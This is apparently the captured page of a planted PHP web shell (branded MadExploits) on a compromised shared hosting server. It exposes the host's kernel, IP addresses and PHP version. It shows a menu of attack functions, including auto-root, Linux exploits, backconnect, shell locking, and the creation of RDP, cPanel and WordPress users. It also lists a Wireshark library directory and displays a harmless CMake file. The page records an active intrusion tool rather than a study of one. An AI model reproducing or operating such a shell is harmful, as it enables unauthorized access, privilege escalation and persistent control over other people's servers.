Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.144.83.48
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
wireshark /
[ HOME SHELL ]
Name
Size
Permission
Action
extcap
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
FindGLIB2.cmake
2.85
KB
-rw-r--r--
FindWSWinLibs.cmake
1.04
KB
-rw-r--r--
FindWireshark.cmake
888
B
-rw-r--r--
LocatePythonModule.cmake
1.92
KB
-rw-r--r--
UseAsn2Wrs.cmake
2.72
KB
-rw-r--r--
UseMakePluginReg.cmake
452
B
-rw-r--r--
WiresharkConfig.cmake
578
B
-rw-r--r--
WiresharkConfigVersion.cmake
300
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FindGLIB2.cmake
# # - Try to find the GLIB2 libraries # Once done this will define # # GLIB2_FOUND - system has glib2 # GLIB2_INCLUDE_DIRS - the glib2 include directory # GLIB2_LIBRARIES - glib2 library # GLIB2_DLL_DIR - (Windows) Path to required GLib2 DLLs. # GLIB2_DLLS - (Windows) List of required GLib2 DLLs. # Copyright (c) 2008 Laurent Montel, <montel@kde.org> # # Redistribution and use is allowed according to the terms of the BSD license. # For details see the accompanying COPYING-CMAKE-SCRIPTS file. if( GLIB2_MAIN_INCLUDE_DIR AND GLIB2_LIBRARIES ) # Already in cache, be silent set( GLIB2_FIND_QUIETLY TRUE ) endif() include( FindWSWinLibs ) if( ENABLE_GTK3 ) FindWSWinLibs( "gtk3" "GLIB2_HINTS" ) else() FindWSWinLibs( "gtk2" "GLIB2_HINTS" ) endif() if (NOT WIN32) find_package(PkgConfig) if( GLIB2_MIN_VERSION ) pkg_search_module( GLIB2 glib-2.0>=${GLIB2_MIN_VERSION} ) else() pkg_search_module( GLIB2 glib-2.0 ) endif() endif() find_path( GLIB2_MAIN_INCLUDE_DIR NAMES glib.h HINTS "${GLIB2_INCLUDEDIR}" "${GLIB2_HINTS}/include" PATH_SUFFIXES glib-2.0 glib-2.0/include PATHS /opt/gnome/include /opt/local/include /sw/include /usr/include /usr/local/include ) find_library( GLIB2_LIBRARY NAMES glib-2.0 libglib-2.0 HINTS "${GLIB2_LIBDIR}" "${GLIB2_HINTS}/lib" PATHS /opt/gnome/lib64 /opt/gnome/lib /opt/lib/ /opt/local/lib /sw/lib/ /usr/lib64 /usr/lib ) # search the glibconfig.h include dir under the same root where the library is found get_filename_component( glib2LibDir "${GLIB2_LIBRARY}" PATH) find_path( GLIB2_INTERNAL_INCLUDE_DIR NAMES glibconfig.h HINTS "${GLIB2_INCLUDEDIR}" "${glib2LibDir}" ${CMAKE_SYSTEM_LIBRARY_PATH} PATH_SUFFIXES glib-2.0/include PATHS ${GLIB2_LIBRARY} ) include( FindPackageHandleStandardArgs ) find_package_handle_standard_args( GLIB2 DEFAULT_MSG GLIB2_LIBRARY GLIB2_MAIN_INCLUDE_DIR ) if( GLIB2_FOUND ) set( GLIB2_LIBRARIES ${GLIB2_LIBRARY} ) set( GLIB2_INCLUDE_DIRS ${GLIB2_MAIN_INCLUDE_DIR} ${GLIB2_INTERNAL_INCLUDE_DIR} ) if ( WIN32 AND GLIB2_FOUND ) set ( GLIB2_DLL_DIR "${GLIB2_HINTS}/bin" CACHE PATH "Path to GLib 2 DLLs" ) file( GLOB _glib2_dlls RELATIVE "${GLIB2_DLL_DIR}" "${GLIB2_DLL_DIR}/libglib-*.dll" "${GLIB2_DLL_DIR}/libgio-*.dll" "${GLIB2_DLL_DIR}/libgmodule-*.dll" "${GLIB2_DLL_DIR}/libgobject-*.dll" "${GLIB2_DLL_DIR}/libintl-*.dll" "${GLIB2_DLL_DIR}/libgcc_s_*.dll" ) set ( GLIB2_DLLS ${_glib2_dlls} # We're storing filenames only. Should we use STRING instead? CACHE FILEPATH "GLib 2 DLL list" ) mark_as_advanced( GLIB2_DLL_DIR GLIB2_DLLS ) endif() elseif( GLIB2_FIND_REQUIRED ) message( SEND_ERROR "Package required but not found" ) else() set( GLIB2_LIBRARIES ) set( GLIB2_MAIN_INCLUDE_DIRS ) set( GLIB2_DLL_DIR ) set( GLIB2_DLLS ) endif() mark_as_advanced( GLIB2_INCLUDE_DIRS GLIB2_LIBRARIES )
Close